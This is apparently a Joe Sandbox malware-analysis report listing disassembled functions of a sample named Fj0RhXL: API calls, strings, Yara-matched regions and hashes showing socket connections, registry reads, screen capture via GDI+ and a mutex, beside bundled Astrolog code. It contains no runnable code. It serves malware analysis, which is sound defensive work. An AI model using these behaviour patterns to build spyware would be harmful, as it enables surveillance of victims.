Part of subcall function 6C3D8FFB: DecodePointer.KERNEL32(00000006,6C3D5BB6,6C3D5B9C,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D900C
Part of subcall function 6C3D8FFB: TlsFree.KERNEL32(00000014,6C3D5BB6,6C3D5B9C,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D9026

__setargv.LIBCMT ref: 6C3D5B28
__setenvp.LIBCMT ref: 6C3D5B31
__cinit.LIBCMT ref: 6C3D5B3C
__ioterm.LIBCMT ref: 6C3D5B81
__mtterm.LIBCMT ref: 6C3D5B86

Strings

PNv, xrefs: 6C3D5BE8

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: EnvironmentStrings__ioterm__mtterm$CommandCreateCriticalDecodeDeleteFreeHeapInfoInitializeLinePointerSectionStartup___crt__calloc_crt__cinit__heap_init__ioinit__setargv__setenvp_free
String ID: PNv
API String ID: 2991414096-4070351811
Opcode ID: 172cb925bc8e6187254615f44d767fce466aec4561e8a127e04b587f1e32c85b
Instruction ID: 8d5c63a71aeefdcd6ca6d24338035ccbe65135897e4675c9c045e606872fa846
Opcode Fuzzy Hash: 172cb925bc8e6187254615f44d767fce466aec4561e8a127e04b587f1e32c85b
Instruction Fuzzy Hash: 6031B3B364975586DA12BBB5A90458E36B4EF0236CB230A17D8D0C2E50DF32F5498F73

Function 6C397CC1 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 536COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6C397DF6
_free.LIBCMT ref: 6C397E0B
_sprintf.LIBCMT ref: 6C397EED
_strncmp.LIBCMT ref: 6C397F22
_sprintf.LIBCMT ref: 6C3982B3
_sprintf.LIBCMT ref: 6C3982E2
_sprintf.LIBCMT ref: 6C39834D

Strings

plan. moon No. %d (%s): , xrefs: 6C3982AD
planets eph. file (%s): , xrefs: 6C3982CF
se1, xrefs: 6C397EE2
asteroid eph. file (%s): , xrefs: 6C3982C3
moon eph. file (%s): , xrefs: 6C3982D6
jd %f < lower limit %f;, xrefs: 6C39831D
.;C:\Astrolog\, xrefs: 6C397F50
asteroid No. %d (%s): , xrefs: 6C398271
plan. COB No. %d (%s): , xrefs: 6C3982A6
s.%s, xrefs: 6C397EE7
99., xrefs: 6C39828B
jd %f > upper limit %f;, xrefs: 6C39833E

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$_free$_strncmp
String ID: .;C:\Astrolog\$99.$asteroid No. %d (%s): $asteroid eph. file (%s): $jd %f < lower limit %f;$jd %f > upper limit %f;$moon eph. file (%s): $plan. COB No. %d (%s): $plan. moon No. %d (%s): $planets eph. file (%s): $s.%s$se1
API String ID: 1187704711-3796515
Opcode ID: 0d7016fa19dfbb9b21ccc1afefb61c7c4e514e0086cad3d5bb35e74e491887d5
Instruction ID: dfdeb3d3b6e114aeadeff79419a4eb6177ca3337bc51a14cc6aabddd74f92156
Opcode Fuzzy Hash: 0d7016fa19dfbb9b21ccc1afefb61c7c4e514e0086cad3d5bb35e74e491887d5
Instruction Fuzzy Hash: E212F871904A09CBDB21CF24D884BDA77F8FF86308F1046DAD4D997990EB319A88CF52

Function 03D959D0 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 346
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 03D95A13
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03D95A33

Strings

%s_bin, xrefs: 03D95AF3
Console, xrefs: 03D959F9
Console\0, xrefs: 03D95D9C
IpDatespecial, xrefs: 03D95A2D

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID: %s_bin$Console$Console\0$IpDatespecial
API String ID: 4153817207-1338088003
Opcode ID: d735a43e01642058869e0debbe4e11af6795f53684919983d29c0000bd7a0eac
Instruction ID: d07195b85f353a9cf623c92cf6bc92dd80c41312340ce8dcf811676a191e780f
Opcode Fuzzy Hash: d735a43e01642058869e0debbe4e11af6795f53684919983d29c0000bd7a0eac
Instruction Fuzzy Hash: 3FC1E7B6A003009BFB11EF24EC45B6B73E9EF95714F080529F9499B281E775E914C7A2

Function 03D94B10 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GdipGetImagePixelFormat.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94B3B
GdipGetImageHeight.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94BBC
GdipGetImageWidth.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94BE4
GdipGetImagePaletteSize.GDIPLUS(Function_000146F0,?,?,00000000), ref: 03D94C3F
_malloc.LIBCMT ref: 03D94C80

Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83

_free.LIBCMT ref: 03D94CC0
GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 03D94CE8
SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 03D94D77
GdipBitmapLockBits.GDIPLUS(Function_000146F0,?,00000001,?,?,?,00000000), ref: 03D94DD2
_free.LIBCMT ref: 03D94DF4
_memcpy_s.LIBCMT ref: 03D94E43
GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 03D94E90
GdipCreateBitmapFromScan0.GDIPLUS(?,?,03DB67B0,00022009,?,00000000,?,00000000), ref: 03D94EEC
GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 03D94F0C
GdipDrawImageI.GDIPLUS(00000000,Function_000146F0,00000000,00000000,?,00000000), ref: 03D94F27
GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 03D94F34
GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 03D94F3B
_free.LIBCMT ref: 03D94F56

Strings

&, xrefs: 03D94BA1

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
String ID: &
API String ID: 640422297-3042966939
Opcode ID: dd9925b03a97e67b471412e6bc84f7053da4b090b6e0d2505bae2dbd95b3424b
Instruction ID: cdfd8ccd2d155072f8722d5c98121843608df389ebf7aaf5717e694742691868
Opcode Fuzzy Hash: dd9925b03a97e67b471412e6bc84f7053da4b090b6e0d2505bae2dbd95b3424b
Instruction Fuzzy Hash: 67D153B5A00219DFDB24DF55DC84BAAB7B8FF48704F0485AEE60997201D734AE86CF64

Function 6C35338C Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 129
memoryfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6C353393
CreateMutexA.KERNEL32(00000000,00000000,MyProgramMutex,00000020), ref: 6C3533A1
GetLastError.KERNEL32 ref: 6C3533B1
__CxxThrowException@8.LIBCMT ref: 6C3533D1
CreateThread.KERNEL32(00000000,00000000,Function_0000334B,00000000,00000000,6C47A980), ref: 6C353433
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6C353451
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C35345C
ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C353477
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C353484
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4433F8), ref: 6C353494
_memmove.LIBCMT ref: 6C3534AC
HeapCreate.KERNEL32(00040000,-000000C9,00000000), ref: 6C3534C5

Part of subcall function 6C3D2E33: _doexit.LIBCMT ref: 6C3D2E3F

HeapAlloc.KERNEL32(00000000,00000008,-000000C9), ref: 6C3534CF
_memmove.LIBCMT ref: 6C3534DC
GetDC.USER32(00000000), ref: 6C3534E5
EnumObjects.GDI32(00000000,00000002,00000000,00000000), ref: 6C3534F0

Strings

_w8g, xrefs: 6C3533D8
1wps, xrefs: 6C3533DF
MyProgramMutex, xrefs: 6C353398

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Create$File$CloseHandleHeap_memmove$AllocEnumErrorException@8H_prolog3_catch_LastMutexObjectsReadSizeThreadThrow_doexit
String ID: 1wps$MyProgramMutex$_w8g
API String ID: 2890720275-2654228369
Opcode ID: 03afd97380544656ad7431d0fe0afc3b2b3dfeb6cfe4c66a5c598b3628de8c4e
Instruction ID: 57efa1ec88aff2ad4795f6340663797ec7b472815af0818e4185f87c9f2c254f
Opcode Fuzzy Hash: 03afd97380544656ad7431d0fe0afc3b2b3dfeb6cfe4c66a5c598b3628de8c4e
Instruction Fuzzy Hash: 9641BDB1A01218BBDB01AFB59C8DEEF7EBDEB0A315F600925F551A2640DB318D158BB1

Function 03D82D70 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 03D82D8B
InterlockedExchange.KERNEL32(?,00000000), ref: 03D82D97
timeGetTime.WINMM ref: 03D82D9D
socket.WS2_32(00000002,00000001,00000006), ref: 03D82DCA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03D82DF6
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03D82E02
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03D82E21
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03D82E2D
gethostbyname.WS2_32(00000000), ref: 03D82E3B
htons.WS2_32(?), ref: 03D82E5D
connect.WS2_32(?,?,00000010), ref: 03D82E7B

Strings

0u, xrefs: 03D82EEC

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: 7d0a34009549284c7590375a9c0d0b8b5fe06d623f62c9e2b88e5096630242e0
Instruction ID: c117ff9b50ae997970f5f624a7821b0b140639d764e7ed352e407a4d91abe926
Opcode Fuzzy Hash: 7d0a34009549284c7590375a9c0d0b8b5fe06d623f62c9e2b88e5096630242e0
Instruction Fuzzy Hash: 7E612272A40704EFE720EFA4DC45FABB7B8EF48B10F104A1DF655EB290D670A9058B64

Function 02F02D70 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 02F02D8B
InterlockedExchange.KERNEL32(?,00000000), ref: 02F02D97
timeGetTime.WINMM ref: 02F02D9D
socket.WS2_32(00000002,00000001,00000006), ref: 02F02DCA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02F02DF6
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02F02E02
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02F02E21
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02F02E2D
gethostbyname.WS2_32(00000000), ref: 02F02E3B
htons.WS2_32(?), ref: 02F02E5D
connect.WS2_32(?,?,00000010), ref: 02F02E7B

Strings

0u, xrefs: 02F02EEC

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: 8643f094a6de5cdf1ca8e0e4792443bdca66ea26276c47ccd151f5cbf8bfdd33
Instruction ID: 6f66dca0d959dc1d005cb64657e9da3a9a357c5d8b07a9045bba1e57b47f0c20
Opcode Fuzzy Hash: 8643f094a6de5cdf1ca8e0e4792443bdca66ea26276c47ccd151f5cbf8bfdd33
Instruction Fuzzy Hash: 496146B1A40308AFE720DFA4DC85FAAB7B9FF49750F504519FA46E72C0D7B0A9148B64

Function 03D87880 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 222
stringcomregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 03D878BB
lstrcatW.KERNEL32(03DC4360,03DB5A64,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D878FD
lstrcatW.KERNEL32(03DC4360,03DB5FCC,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87909
CoCreateInstance.OLE32(03DB24B0,00000000,00000017,03DB64BC,?,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87950
_memset.LIBCMT ref: 03D879FE
wsprintfW.USER32 ref: 03D87A66
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03D87A8F
_memset.LIBCMT ref: 03D87AA6

Part of subcall function 03D87780: _memset.LIBCMT ref: 03D877AC
Part of subcall function 03D87780: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03D877B8

Strings

CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 03D87A60

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
API String ID: 1221949200-4035668053
Opcode ID: d01d21ac7effa6a696e21b177863310f9e9a3494b7d87d5cc20947eba28afca8
Instruction ID: 35812a3a4c0d2a4797478a28f6f0f9dd1c07a5110df7e2fa37e4ba144b6051d5
Opcode Fuzzy Hash: d01d21ac7effa6a696e21b177863310f9e9a3494b7d87d5cc20947eba28afca8
Instruction Fuzzy Hash: 8181D8F2A10229EFD721DBA5CC41FEEB7B9EB88700F1441C9F619A7241D674AA44CF64

Function 6C35B1DE Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_sprintf.LIBCMT ref: 6C35B1F5
_sprintf.LIBCMT ref: 6C35B218

Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF

__wgetenv.LIBCMT ref: 6C35B24B
_sprintf.LIBCMT ref: 6C35B270
__wgetenv.LIBCMT ref: 6C35B27D
_sprintf.LIBCMT ref: 6C35B2A2
__wgetenv.LIBCMT ref: 6C35B2AB
_sprintf.LIBCMT ref: 6C35B2D0
_sprintf.LIBCMT ref: 6C35B2F2

Strings

ASTROLOG, xrefs: 6C35B278
%s%s, xrefs: 6C35B216, 6C35B2DE
7.10, xrefs: 6C35B208
ASTR, xrefs: 6C35B20D, 6C35B212, 6C35B2AA
C:\Astrolog, xrefs: 6C35B2D8

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__wgetenv$__output_l
String ID: %s%s$7.10$ASTR$ASTROLOG$C:\Astrolog
API String ID: 2520948663-3225433610
Opcode ID: a4add5877c75b6eb68cea135925fa746c337cfc7d02e47becf29a49cc7d62997
Instruction ID: 115753645959fad13315a117151925cd48c7bece72980ab9ad048b6c05c0983d
Opcode Fuzzy Hash: a4add5877c75b6eb68cea135925fa746c337cfc7d02e47becf29a49cc7d62997
Instruction Fuzzy Hash: 5531C7B28005889AEB40D6A4DC44FFE776C9F4231CF6404A198C1DFE51EB269598CF72

Function 03D96D30 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,90594F2A,?,00000000,?), ref: 03D96D6E
GlobalLock.KERNEL32(00000000), ref: 03D96D77
_memmove.LIBCMT ref: 03D96D83
GlobalUnlock.KERNEL32(00000000), ref: 03D96D8C
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03D96DA2
EnterCriticalSection.KERNEL32(03DC1EA4), ref: 03D96DE0
LeaveCriticalSection.KERNEL32(03DC1EA4), ref: 03D96DF1

Part of subcall function 03D94AA0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03D94AC4
Part of subcall function 03D94AA0: GdipDisposeImage.GDIPLUS(?), ref: 03D94AD8

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03D96E19

Part of subcall function 03D95120: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03D9514D
Part of subcall function 03D95120: _free.LIBCMT ref: 03D951C3

GetHGlobalFromStream.OLE32(?,?), ref: 03D96E3A
GlobalLock.KERNEL32(?), ref: 03D96E44
GlobalFree.KERNEL32(00000000), ref: 03D96E5D

Part of subcall function 03D94860: DeleteObject.GDI32(?), ref: 03D94892
Part of subcall function 03D94860: EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948A3
Part of subcall function 03D94860: EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948B8
Part of subcall function 03D94860: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03D9483B), ref: 03D948C4
Part of subcall function 03D94860: LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948D5
Part of subcall function 03D94860: LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948DC

GlobalSize.KERNEL32(00000000), ref: 03D96E72
_memmove.LIBCMT ref: 03D96E8F
GlobalUnlock.KERNEL32(?), ref: 03D96EE6
GlobalFree.KERNEL32(00000000), ref: 03D96F0B

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock_memmove$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
String ID:
API String ID: 2505451885-0
Opcode ID: 78a34c0a9751c1a578d328ffeaa159941fed24793f982a8cc5c245d9132f246b
Instruction ID: f97a70ef53b6cb2ae50c8549f418dc2b718879e089676951e95591fb3d13b1d8
Opcode Fuzzy Hash: 78a34c0a9751c1a578d328ffeaa159941fed24793f982a8cc5c245d9132f246b
Instruction Fuzzy Hash: 336139B6D10218EFDB10EFA5E884A9EBBB9FF48710F10451AF515A7305DB709905CFA0

Function 03D88990 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03D85DC8,0000035E,000002FA), ref: 03D8899C
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 03D889B2
swprintf.LIBCMT ref: 03D889EF

Part of subcall function 03D88910: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03D88A23), ref: 03D8893D
Part of subcall function 03D88910: GetProcAddress.KERNEL32(00000000), ref: 03D88944
Part of subcall function 03D88910: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03D88A23), ref: 03D88952

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03D88A47
RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03D88A63
RegCloseKey.KERNEL32(000002FA), ref: 03D88A86
FreeLibrary.KERNEL32(00000000,?,?,?,03D85DC8,0000035E,000002FA), ref: 03D88A98

Strings

%d.%d.%d, xrefs: 03D889E7
RtlGetNtVersionNumbers, xrefs: 03D889AC
ProductName, xrefs: 03D88A5D
ntdll.dll, xrefs: 03D88997
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03D88A3D

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 2158625971-3190923360
Opcode ID: d013b5b9d48e687c96c9be5f09c7f759264538e2aed067854f8dfd135c1cda6a
Instruction ID: 7d43008f0f347a830a8991f7b28976a1e611b34a1b3ae4ed4012aada99606b4d
Opcode Fuzzy Hash: d013b5b9d48e687c96c9be5f09c7f759264538e2aed067854f8dfd135c1cda6a
Instruction Fuzzy Hash: 0C31A476640308FFEB14EBA4CC45FFF777CEB48741F044519BA1AA6285E674DA048760

Function 02F06110 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 186sleepregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 02F07684: __fassign.LIBCMT ref: 02F0767A

Sleep.KERNEL32(00000000), ref: 02F0614C
RegOpenKeyExW.KERNEL32(80000001,end,00000000,00020019,?), ref: 02F06168
RegCloseKey.ADVAPI32(?), ref: 02F06176
ExitProcess.KERNEL32 ref: 02F0617D
Sleep.KERNEL32(00000000), ref: 02F062E0
